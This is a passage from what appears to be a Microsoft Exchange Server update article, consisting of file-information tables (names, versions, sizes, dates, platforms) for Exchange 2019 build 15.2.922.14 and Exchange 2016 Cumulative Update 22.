15.2.922.14| 15,224| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.922.14| 18,816| 25-Sep-21| 2:12| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.922.14| 18,824| 25-Sep-21| 4:11| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.922.14| 118,664| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.922.14| 924,536| 25-Sep-21| 3:57| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.922.14| 1,469,328| 25-Sep-21| 3:59| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.922.14| 32,648| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.922.14| 41,872| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.922.14| 24,952| 25-Sep-21| 3:15| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.922.14| 15,232| 25-Sep-21| 2:15| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.922.14| 83,344| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.922.14| 50,064| 25-Sep-21| 4:31| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.922.14| 658,824| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.922.14| 186,240| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.922.14| 67,472| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.922.14| 12,680| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.922.14| 56,704| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.922.14| 28,032| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.922.14| 120,712| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.922.14| 31,632| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.922.14| 57,224| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.922.14| 35,704| 25-Sep-21| 2:11| x86 \nMicrosoft.exchange.webservices.dll| 15.2.922.14| 1,054,080| 25-Sep-21| 2:09| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.922.14| 67,976| 25-Sep-21| 2:10| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.922.14| 23,416| 25-Sep-21| 3:47| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.922.14| 77,192| 25-Sep-21| 2:27| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.922.14| 17,296| 25-Sep-21| 2:15| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.922.14| 29,072| 25-Sep-21| 2:10| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.922.14| 505,224| 25-Sep-21| 3:33| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.922.14| 14,736| 25-Sep-21| 2:11| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.922.14| 36,752| 25-Sep-21| 2:33| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.922.14| 66,424| 25-Sep-21| 3:36| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.922.14| 19,320| 25-Sep-21| 2:09| x86 \nMicrosoft.filtering.dll| 15.2.922.14| 113,024| 25-Sep-21| 2:35| x86 \nMicrosoft.filtering.exchange.dll| 15.2.922.14| 57,232| 25-Sep-21| 3:51| x86 \nMicrosoft.filtering.interop.dll| 15.2.922.14| 15,240| 25-Sep-21| 2:33| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.922.14| 46,968| 25-Sep-21| 3:03| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.922.14| 15,752| 25-Sep-21| 2:13| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.922.14| 23,944| 25-Sep-21| 2:10| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.922.14| 22,400| 25-Sep-21| 2:09| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.922.14| 34,696| 25-Sep-21| 2:09| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,894| 25-Sep-21| 4:42| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,270| 25-Sep-21| 4:42| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.922.14| 1,518,456| 25-Sep-21| 5:23| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.922.14| 13,192| 25-Sep-21| 2:12| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.922.14| 33,152| 25-Sep-21| 5:03| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.922.14| 18,296| 25-Sep-21| 2:09| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.922.14| 46,472| 25-Sep-21| 3:52| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.922.14| 50,552| 25-Sep-21| 3:54| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.922.14| 72,592| 25-Sep-21| 2:28| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.922.14| 541,576| 25-Sep-21| 2:28| x86 \nMicrosoft.managementgui.dll| 15.2.922.14| 133,512| 25-Sep-21| 2:09| x86 \nMicrosoft.mce.interop.dll| 15.2.922.14| 24,440| 25-Sep-21| 2:09| x86 \nMicrosoft.office.audit.dll| 15.2.922.14| 124,800| 25-Sep-21| 2:09| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.922.14| 593,288| 25-Sep-21| 2:40| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.922.14| 42,376| 25-Sep-21| 2:33| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.922.14| 217,976| 25-Sep-21| 6:24| x86 \nMicrosoft.office.compliance.console.dll| 15.2.922.14| 854,920| 25-Sep-21| 6:39| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.922.14| 485,752| 25-Sep-21| 6:32| x86 \nMicrosoft.office.compliance.core.dll| 15.2.922.14| 413,048| 25-Sep-21| 2:33| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.922.14| 36,224| 25-Sep-21| 2:33| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.922.14| 85,368| 25-Sep-21| 3:50| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.922.14| 1,783,688| 25-Sep-21| 2:27| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.922.14| 49,552| 25-Sep-21| 3:47| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.922.14| 27,536| 25-Sep-21| 3:53| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.922.14| 174,968| 25-Sep-21| 2:33| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.922.14| 166,264| 25-Sep-21| 3:15| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.922.14| 40,320| 25-Sep-21| 2:09| x86 \nMicrosoft.online.box.shell.dll| 15.2.922.14| 46,456| 25-Sep-21| 2:09| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.922.14| 67,976| 25-Sep-21| 2:09| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.922.14| 67,976| 25-Sep-21| 2:09| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.922.14| 120,192| 25-Sep-21| 2:33| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,122| 25-Sep-21| 2:28| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,084| 25-Sep-21| 2:27| Not applicable \nMovemailbox.ps1| Not applicable| 61,140| 25-Sep-21| 2:28| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,586| 25-Sep-21| 2:28| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,532| 25-Sep-21| 2:28| Not applicable \nMpgearparser.dll| 15.2.922.14| 99,704| 25-Sep-21| 2:12| x64 \nMsclassificationadapter.dll| 15.2.922.14| 248,720| 25-Sep-21| 2:15| x64 \nMsexchangecompliance.exe| 15.2.922.14| 78,736| 25-Sep-21| 4:19| x86 \nMsexchangedagmgmt.exe| 15.2.922.14| 25,464| 25-Sep-21| 4:01| x86 \nMsexchangedelivery.exe| 15.2.922.14| 38,792| 25-Sep-21| 3:58| x86 \nMsexchangefrontendtransport.exe| 15.2.922.14| 31,632| 25-Sep-21| 3:51| x86 \nMsexchangehmhost.exe| 15.2.922.14| 27,000| 25-Sep-21| 5:23| x86 \nMsexchangehmrecovery.exe| 15.2.922.14| 29,560| 25-Sep-21| 3:15| x86 \nMsexchangemailboxassistants.exe| 15.2.922.14| 72,592| 25-Sep-21| 3:58| x86 \nMsexchangemailboxreplication.exe| 15.2.922.14| 20,880| 25-Sep-21| 4:08| x86 \nMsexchangemigrationworkflow.exe| 15.2.922.14| 68,992| 25-Sep-21| 4:12| x86 \nMsexchangerepl.exe| 15.2.922.14| 71,048| 25-Sep-21| 3:58| x86 \nMsexchangesubmission.exe| 15.2.922.14| 123,280| 25-Sep-21| 4:12| x86 \nMsexchangethrottling.exe| 15.2.922.14| 39,800| 25-Sep-21| 3:03| x86 \nMsexchangetransport.exe| 15.2.922.14| 74,120| 25-Sep-21| 3:03| x86 \nMsexchangetransportlogsearch.exe| 15.2.922.14| 139,144| 25-Sep-21| 3:51| x86 \nMsexchangewatchdog.exe| 15.2.922.14| 55,688| 25-Sep-21| 2:11| x64 \nMspatchlinterop.dll| 15.2.922.14| 53,640| 25-Sep-21| 2:28| x64 \nNativehttpproxy.dll| 15.2.922.14| 91,512| 25-Sep-21| 2:12| x64 \nNavigatorparser.dll| 15.2.922.14| 636,808| 25-Sep-21| 2:11| x64 \nNego2nativeinterface.dll| 15.2.922.14| 19,320| 25-Sep-21| 2:10| x64 \nNegotiateclientcertificatemodule.dll| 15.2.922.14| 30,088| 25-Sep-21| 2:11| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,784| 25-Sep-21| 2:28| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,575| 25-Sep-21| 2:28| Not applicable \nNtspxgen.dll| 15.2.922.14| 80,760| 25-Sep-21| 2:12| x64 \nOleconverter.exe| 15.2.922.14| 173,952| 25-Sep-21| 2:15| x64 \nOutsideinmodule.dll| 15.2.922.14| 87,944| 25-Sep-21| 2:12| x64 \nOwaauth.dll| 15.2.922.14| 92,048| 25-Sep-21| 2:11| x64 \nPerf_common_extrace.dll| 15.2.922.14| 245,112| 25-Sep-21| 2:09| x64 \nPerf_exchmem.dll| 15.2.922.14| 86,408| 25-Sep-21| 2:09| x64 \nPipeline2.dll| 15.2.922.14| 1,454,472| 25-Sep-21| 2:27| x64 \nPreparemoverequesthosting.ps1| Not applicable| 70,991| 25-Sep-21| 2:28| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,229| 25-Sep-21| 2:27| Not applicable \nProductinfo.managed.dll| 15.2.922.14| 27,016| 25-Sep-21| 2:09| x86 \nProxybinclientsstringsdll| 15.2.922.14| 924,552| 25-Sep-21| 2:15| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,250| 25-Sep-21| 2:27| Not applicable \nQuietexe.exe| 15.2.922.14| 14,720| 25-Sep-21| 2:11| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,532| 25-Sep-21| 2:27| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,655| 25-Sep-21| 4:39| Not applicable \nRemoteexchange.ps1| Not applicable| 23,573| 25-Sep-21| 4:44| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,684| 25-Sep-21| 2:28| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,002| 25-Sep-21| 2:28| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,012| 25-Sep-21| 2:28| Not applicable \nReplaycrimsonmsg.dll| 15.2.922.14| 1,104,760| 25-Sep-21| 2:09| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,476| 25-Sep-21| 4:39| Not applicable \nResetcasservice.ps1| Not applicable| 21,707| 25-Sep-21| 2:28| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,101| 25-Sep-21| 2:09| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,141| 25-Sep-21| 2:09| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,230| 25-Sep-21| 2:27| Not applicable \nRightsmanagementwrapper.dll| 15.2.922.14| 86,400| 25-Sep-21| 2:28| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,790| 25-Sep-21| 2:28| Not applicable \nRpcperf.dll| 15.2.922.14| 23,440| 25-Sep-21| 2:11| x64 \nRpcproxyshim.dll| 15.2.922.14| 39,312| 25-Sep-21| 2:27| x64 \nRulesauditmsg.dll| 15.2.922.14| 12,664| 25-Sep-21| 2:12| x64 \nSafehtmlnativewrapper.dll| 15.2.922.14| 34,688| 25-Sep-21| 2:15| x64 \nScanenginetest.exe| 15.2.922.14| 956,304| 25-Sep-21| 2:18| x64 \nScanningprocess.exe| 15.2.922.14| 739,216| 25-Sep-21| 2:28| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,812| 25-Sep-21| 2:28| Not applicable \nServicecontrol.ps1| Not applicable| 52,349| 25-Sep-21| 2:09| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,754| 25-Sep-21| 2:28| Not applicable \nSettingsadapter.dll| 15.2.922.14| 116,112| 25-Sep-21| 2:12| x64 \nSetup.exe| 15.2.922.14| 20,368| 25-Sep-21| 2:33| x86 \nSetupui.exe| 15.2.922.14| 188,296| 25-Sep-21| 4:36| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,189| 25-Sep-21| 2:27| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,847| 25-Sep-21| 2:28| Not applicable \nStatisticsutil.dll| 15.2.922.14| 142,216| 25-Sep-21| 2:15| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,133| 25-Sep-21| 2:27| Not applicable \nStoretsconstants.ps1| Not applicable| 15,850| 25-Sep-21| 2:18| Not applicable \nStoretslibrary.ps1| Not applicable| 28,015| 25-Sep-21| 2:18| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.922.14| 28,536| 25-Sep-21| 2:11| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,927| 25-Sep-21| 2:28| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,973| 25-Sep-21| 2:28| Not applicable \nTextconversionmodule.dll| 15.2.922.14| 86,392| 25-Sep-21| 2:11| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,747| 25-Sep-21| 2:18| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,433| 25-Sep-21| 2:18| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,013| 25-Sep-21| 2:18| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,473| 25-Sep-21| 2:09| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,010| 25-Sep-21| 2:28| Not applicable \nUpdatecas.ps1| Not applicable| 38,193| 25-Sep-21| 2:09| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,742| 25-Sep-21| 2:09| Not applicable \nUpdateserver.exe| 15.2.922.14| 3,014,536| 25-Sep-21| 2:28| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,156| 25-Sep-21| 2:27| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 32,046| 25-Sep-21| 6:19| Not applicable \nWsbexchange.exe| 15.2.922.14| 125,328| 25-Sep-21| 2:28| x64 \nX400prox.dll| 15.2.922.14| 103,304| 25-Sep-21| 2:12| x64 \n_search.lingoperators.a| 15.2.922.14| 34,696| 25-Sep-21| 3:39| Not applicable \n_search.lingoperators.b| 15.2.922.14| 34,696| 25-Sep-21| 3:39| Not applicable \n_search.mailboxoperators.a| 15.2.922.14| 290,192| 25-Sep-21| 4:10| Not applicable \n_search.mailboxoperators.b| 15.2.922.14| 290,192| 25-Sep-21| 4:10| Not applicable \n_search.operatorschema.a| 15.2.922.14| 485,776| 25-Sep-21| 3:22| Not applicable \n_search.operatorschema.b| 15.2.922.14| 485,776| 25-Sep-21| 3:22| Not applicable \n_search.tokenoperators.a| 15.2.922.14| 113,544| 25-Sep-21| 3:37| Not applicable \n_search.tokenoperators.b| 15.2.922.14| 113,544| 25-Sep-21| 3:37| Not applicable \n_search.transportoperators.a| 15.2.922.14| 67,960| 25-Sep-21| 4:14| Not applicable \n_search.transportoperators.b| 15.2.922.14| 67,960| 25-Sep-21| 4:14| Not applicable \n \n## \n\n__\n\nMicrosoft Exchange Server 2016 Cumulative Update 22\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.1.2375.12| 71,056| 4-Oct-21| 7:51| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,502| 4-Oct-21| 7:51| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,925| 4-Oct-21| 8:07| Not applicable \nAdemodule.dll| 15.1.2375.12| 106,384| 4-Oct-21| 7:53| x64 \nAirfilter.dll| 15.1.2375.12| 42,896| 4-Oct-21| 7:52| x64 \nAjaxcontroltoolkit.dll| 15.1.2375.12| 92,536| 4-Oct-21| 8:07| x86 \nAntispamcommon.ps1| Not applicable| 13,481| 4-Oct-21| 7:51| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 4-Oct-21| 7:53| Not applicable \nAsentirs.msi| Not applicable| 77,824| 4-Oct-21| 7:54| Not applicable \nAsentsig.msi| Not applicable| 73,728| 4-Oct-21| 7:53| Not applicable \nBigfunnel.bondtypes.dll| 15.1.2375.12| 43,896| 4-Oct-21| 7:54| x86 \nBigfunnel.common.dll| 15.1.2375.12| 63,864| 4-Oct-21| 7:47| x86 \nBigfunnel.configuration.dll| 15.1.2375.12| 99,216| 4-Oct-21| 8:09| x86 \nBigfunnel.entropy.dll| 15.1.2375.12| 44,400| 4-Oct-21| 7:52| x86 \nBigfunnel.filter.dll| 15.1.2375.12| 54,152| 4-Oct-21| 7:54| x86 \nBigfunnel.indexstream.dll| 15.1.2375.12| 54,136| 4-Oct-21| 8:07| x86 \nBigfunnel.poi.dll| 15.1.2375.12| 202,632| 4-Oct-21| 7:50| x86 \nBigfunnel.postinglist.dll| 15.1.2375.12| 122,256| 4-Oct-21| 8:07| x86 \nBigfunnel.query.dll| 15.1.2375.12| 99,704| 4-Oct-21| 7:47| x86 \nBigfunnel.ranking.dll| 15.1.2375.12| 79,248| 4-Oct-21| 8:07| x86 \nBigfunnel.syntheticdatalib.dll| 15.1.2375.12| 3,634,576| 4-Oct-21| 8:07| x86 \nBigfunnel.wordbreakers.dll| 15.1.2375.12| 46,480| 4-Oct-21| 8:07| x86 \nCafe_airfilter_dll| 15.1.2375.12| 42,896| 4-Oct-21| 7:52| x64 \nCafe_exppw_dll| 15.1.2375.12| 83,344| 4-Oct-21| 7:52| x64 \nCafe_owaauth_dll| 15.1.2375.12| 92,048| 4-Oct-21| 7:53| x64 \nCalcalculation.ps1| Not applicable| 42,109| 4-Oct-21| 8:11| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,618| 4-Oct-21| 7:55| Not applicable \nChksgfiles.dll| 15.1.2375.12| 57,208| 4-Oct-21| 8:07| x64 \nCitsconstants.ps1| Not applicable| 15,817| 4-Oct-21| 8:08| Not applicable \nCitslibrary.ps1| Not applicable| 82,660| 4-Oct-21| 8:07| Not applicable \nCitstypes.ps1| Not applicable| 14,456| 4-Oct-21| 8:08| Not applicable \nClassificationengine_mce| 15.1.2375.12| 1,693,072| 4-Oct-21| 7:53| Not applicable \nClusmsg.dll| 15.1.2375.12| 134,008| 4-Oct-21| 7:53| x64 \nCoconet.dll| 15.1.2375.12| 48,008| 4-Oct-21| 7:52| x64 \nCollectovermetrics.ps1| Not applicable| 81,636| 4-Oct-21| 7:55| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,882| 4-Oct-21| 7:55| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,943| 4-Oct-21| 9:50| Not applicable \nComplianceauditservice.exe| 15.1.2375.12| 39,816| 4-Oct-21| 9:54| x86 \nConfigureadam.ps1| Not applicable| 22,776| 4-Oct-21| 8:08| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,300| 4-Oct-21| 8:08| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,766| 4-Oct-21| 8:08| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,820| 4-Oct-21| 8:07| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,275| 4-Oct-21| 8:07| Not applicable \nConnectfunctions.ps1| Not applicable| 37,137| 4-Oct-21| 9:50| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,412| 4-Oct-21| 9:50| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,264| 4-Oct-21| 9:42| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,045| 4-Oct-21| 8:07| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,528| 4-Oct-21| 8:07| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,757| 4-Oct-21| 8:07| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,904| 4-Oct-21| 8:07| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts_exsmime.dll| 15.1.2375.12| 380,808| 4-Oct-21| 7:51| x64 \nCts_microsoft.exchange.data.common.dll| 15.1.2375.12| 1,686,408| 4-Oct-21| 7:50| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 509| 4-Oct-21| 7:50| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:53| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:53| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.2375.12| 13,200| 4-Oct-21| 7:51| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.2375.12| 13,200| 4-Oct-21| 7:52| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:52| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:53| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:53| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.2375.12| 13,200| 4-Oct-21| 7:51| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.2375.12| 13,184| 4-Oct-21| 7:54| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.2375.12| 12,664| 4-Oct-21| 7:53| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.2375.12| 12,680| 4-Oct-21| 7:53| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.2375.12| 12,680| 4-Oct-21| 7:54| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.2375.12| 12,664| 4-Oct-21| 7:55| x86 \nDagcommonlibrary.ps1| Not applicable| 60,238| 4-Oct-21| 7:55| Not applicable \nDependentassemblygenerator.exe| 15.1.2375.12| 22,408| 4-Oct-21| 7:51| x86 \nDiaghelper.dll| 15.1.2375.12| 66,952| 4-Oct-21| 7:50| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,330| 4-Oct-21| 8:07| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,354| 4-Oct-21| 8:08| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,185| 4-Oct-21| 8:07| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,650| 4-Oct-21| 8:07| Not applicable \nDisklockerapi.dll| Not applicable| 22,408| 4-Oct-21| 7:52| x64 \nDlmigrationmodule.psm1| Not applicable| 39,572| 4-Oct-21| 8:07| Not applicable \nDsaccessperf.dll| 15.1.2375.12| 45,960| 4-Oct-21| 7:50| x64 \nDscperf.dll| 15.1.2375.12| 32,648| 4-Oct-21| 7:52| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.1.2375.12| 1,686,408| 4-Oct-21| 7:50| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.2375.12| 601,488| 4-Oct-21| 8:19| x86 \nEcpperfcounters.xml| Not applicable| 31,180| 4-Oct-21| 7:54| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:53| x86 \nEdgetransport.exe| 15.1.2375.12| 49,544| 4-Oct-21| 9:10| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 512| 4-Oct-21| 7:50| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:53| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:54| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,176| 4-Oct-21| 7:51| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:52| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:53| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,200| 4-Oct-21| 7:52| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:50| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,184| 4-Oct-21| 7:54| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:52| x86 